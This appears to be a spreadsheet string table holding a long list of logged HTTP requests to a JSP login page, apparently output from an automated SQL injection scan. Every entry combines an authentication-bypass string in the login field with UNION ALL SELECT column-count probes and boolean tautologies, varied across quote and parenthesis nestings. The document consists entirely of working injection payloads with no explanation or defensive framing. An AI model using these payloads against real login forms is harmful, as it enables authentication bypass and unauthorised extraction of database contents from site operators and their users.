    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237,8237--and("dalo"like"dalo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766,4766--and("pecf"like"pecf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876,4876--and("ovzz"like"ovzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568--and("asoj"like"asoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702,2702--and("kpeo"like"kpeo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765,4765--and("xyhu"like"xyhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999--and("ngtl"like"ngtl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170--and("yxob"like"yxob</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700,6700--and("kwpd"like"kwpd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836--and("osuo"like"osuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869,6869--and(("kkwz"like"kkwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520,5520--and(("lecc"like"lecc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188,5188--and(("ymgp"like"ymgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235--and(("kwhn"like"kwhn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769,3769--and(("ihhm"like"ihhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025,9025--and(("bvik"like"bvik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849--and(("yecx"like"yecx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158,5158--and(("oome"like"oome</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853--and(("mndd"like"mndd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338--and(("zenu"like"zenu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632,2632--and((("mmwb"like"mmwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458--and((("ekah"like"ekah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090,7090--and((("bdbc"like"bdbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036,2036--and((("ijhc"like"ijhc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655,8655--and((("rurd"like"rurd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796--and((("tsrc"like"tsrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930,6930--and((("uruc"like"uruc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104,4104--and((("kncp"like"kncp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854,3854--and((("xbmd"like"xbmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709,4709--and((("dmtk"like"dmtk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393--and"qzrv"like"qzrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395--and"yibw"like"yibw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526,9526--and"moqk"like"moqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153,7153--and"wbsm"like"wbsm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042,4042--and"nxrv"like"nxrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677,9677--and"usqu"like"usqu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317--and"zakv"like"zakv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903,9903--and"rndu"like"rndu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549--and"fqzz"like"fqzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225--and"ikoa"like"ikoa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--and(807=807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--and(6871=6871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--and(6574=6574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--and(5972=5972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--and(597=597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--and(8232=8232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--and(2973=2973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--and(3644=3644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,null--and(3807=3807</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(4123=4123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--and((6739=673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--and((7380=7380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--and((8320=8320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--and((7341=7341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--and((795=795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--and((399=39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,null--and((6918=6918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,null,null--and((9=9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,null,null,null--and((7063=7063</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((2894=2894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--and(((6862=6862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--and(((5188=5188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--and(((8679=8679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--and(((6876=6876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--and(((7867=7867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--and(((3471=3471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,null--and(((4316=4316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,null,null--and(((2089=2089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,null,null,null--and(((890=890</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((600=600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unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--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--and('upmx'='upmx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--and('xemq'='xemq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--and('iqat'='iqat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--and('datp'='datp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--and('anhj'='anhj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--and('pfyz'='pfyz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--and('eooj'='eooj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--and('bmgz'='bmgz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--and('xgdt'='xgdt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,null--and('vkyh'='vkyh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--and(('ctnd'='ctnd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--and(('qmjr'='qmjr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--and(('piqm'='piqm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--and(('szxw'='szxw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--and(('yhnd'='yhnd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--and(('sdxf'='sdxf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--and(('kbmv'='kbmv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--and(('iavt'='iavt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,null--and(('zhcp'='zhcp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,null,null--and(('dman'='dman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--and((('htbs'='htbs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--and((('bexc'='bexc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--and((('ubmz'='ubmz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--and((('ylfe'='ylfe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--and((('cjxa'='cjxa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--and((('tqhx'='tqhx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--and((('qgzn'='qgzn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--and((('uoqb'='uoqb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,null--and((('hgzz'='hgzz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,null,null--and((('bfif'='bfif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--and'okvq'='okvq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--and'keqq'='keqq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--and'reol'='reol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--and'fsli'='fsli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--and'aryk'='aryk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--and'qtmz'='qtmz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--and'ukna'='ukna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--and'nruy'='nruy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--and'lwpt'='lwpt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,null--and'ewke'='ewke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--and('faow'like'faow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--and('hway'like'hway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--and('ifyp'like'ifyp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--and('igty'like'igty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--and('wxjx'like'wxjx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--and('wyvs'like'wyvs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--and('pier'like'pier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--and('dagv'like'dagv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--and('ghet'like'ghet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('thlg'like'thlg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--and(('smxu'like'smxu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--and(('svze'like'svze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--and(('fbzb'like'fbzb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--and(('ozlj'like'ozlj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--and(('ebec'like'ebec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--and(('ahio'like'ahio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--and(('kcqp'like'kcqp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--and(('ldsu'like'ldsu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,null--and(('jbac'like'jbac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('fipn'like'fipn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--and((('zzdc'like'zzdc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--and((('jmkz'like'jmkz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--and((('vabz'like'vabz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--and((('terq'like'terq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--and((('hiop'like'hiop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--and((('jher'like'jher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--and((('dxbx'like'dxbx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--and((('ncyn'like'ncyn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,null--and((('bwyd'like'bwyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('qaxv'like'qaxv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--and'zjfq'like'zjfq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--and'mnqq'like'mnqq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--and'bdyl'like'bdyl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--and'fvsp'like'fvsp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--and'olui'like'olui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--and'ijzv'like'ijzv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--and'nhjj'like'nhjj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--and'ipcs'like'ipcs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--and'pfbr'like'pfbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'htkf'like'htkf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--and("wsfi"="wsfi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--and("zppr"="zppr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--and("iclh"="iclh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--and("hpjl"="hpjl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--and("aknj"="aknj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--and("hooq"="hooq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--and("hvrl"="hvrl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--and("kcxd"="kcxd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,null--and("lipi"="lipi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,null,null--and("yxhd"="yxhd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--and(("fgwz"="fgwz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--and(("osxe"="osxe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--and(("jkjf"="jkjf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--and(("cuvl"="cuvl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--and(("lpqw"="lpqw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--and(("mkbc"="mkbc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--and(("sohr"="sohr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--and(("zbvc"="zbvc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--and((("mapm"="mapm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--and((("julr"="julr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--and((("lurx"="lurx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--and((("uhyv"="uhyv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--and((("yzsb"="yzsb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--and((("vgnv"="vgnv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--and((("mxyj"="mxyj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--and((("yxdm"="yxdm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,null--and((("rikd"="rikd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,null,null--and((("pved"="pved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--and"dhxw"="dhxw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--and"lrch"="lrch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--and"texl"="texl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--and"qvio"="qvio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--and"ohcb"="ohcb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--and"ldir"="ldir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--and"kdbk"="kdbk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--and"uctf"="uctf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--and"izcq"="izcq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,null--and"znco"="znco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--and("mcga"like"mcga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--and("pqfo"like"pqfo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--and("otjr"like"otjr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--and("zppa"like"zppa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--and("hnxy"like"hnxy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--and("gind"like"gind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--and("ounj"like"ounj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--and("ortw"like"ortw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,null--and("hvly"like"hvly</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("zish"like"zish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--and(("acag"like"acag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--and(("wzjj"like"wzjj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--and(("mqwn"like"mqwn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--and(("sakz"like"sakz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--and(("nbjw"like"nbjw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--and(("qwrh"like"qwrh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--and(("bice"like"bice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--and(("mqqg"like"mqqg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,null--and(("ersr"like"ersr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("aocq"like"aocq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--and((("soph"like"soph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--and((("uftz"like"uftz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--and((("zgge"like"zgge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--and((("qtof"like"qtof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--and((("mmyx"like"mmyx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--and((("vldx"like"vldx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--and((("xrdz"like"xrdz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--and((("mkeq"like"mkeq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,null--and((("hvdh"like"hvdh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("oogr"like"oogr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--and"ovgy"like"ovgy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--and"rbij"like"rbij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--and"azik"like"azik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--and"mcge"like"mcge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--and"urma"like"urma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--and"rrvf"like"rrvf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--and"ogib"like"ogib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--and"tnyx"like"tnyx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--and"uqnp"like"uqnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"nfmj"like"nfmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516,7516--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883,5883--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920,2920--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384,7384--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567,4567--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233,5233--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963,5963--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154,9154--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103,5103--</t>
